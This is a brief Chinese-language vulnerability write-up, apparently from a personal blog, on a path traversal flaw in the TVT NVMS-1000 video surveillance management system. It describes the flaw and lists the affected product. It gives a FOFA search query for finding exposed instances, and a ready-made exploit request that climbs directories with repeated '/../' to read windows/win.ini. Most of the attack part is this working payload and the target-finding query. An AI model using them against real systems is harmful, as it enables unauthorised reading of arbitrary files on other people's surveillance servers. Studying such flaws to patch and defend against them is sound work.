漏洞描述
i ⭐
TVT数码科技 TVT NVMS-1000是中国TVT数码科技公司的一套网络监控视频管理系统。 TVT数码科技 TVT NVMS-1000中存在路径遍历漏洞。远程攻击者可通过发送包含/../的特制URL请求利用该漏洞查看系统上的任意文件
漏洞影响
s ✅
TVT NVMS-1000
空间测绘
d ⭕
FOFA:app="TVT-NVMS-1000"
漏洞复现
- 访问首页
- ✅ exp
1 | GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 |
个人博客
孤桜懶契:https://gylq.gitee.io/time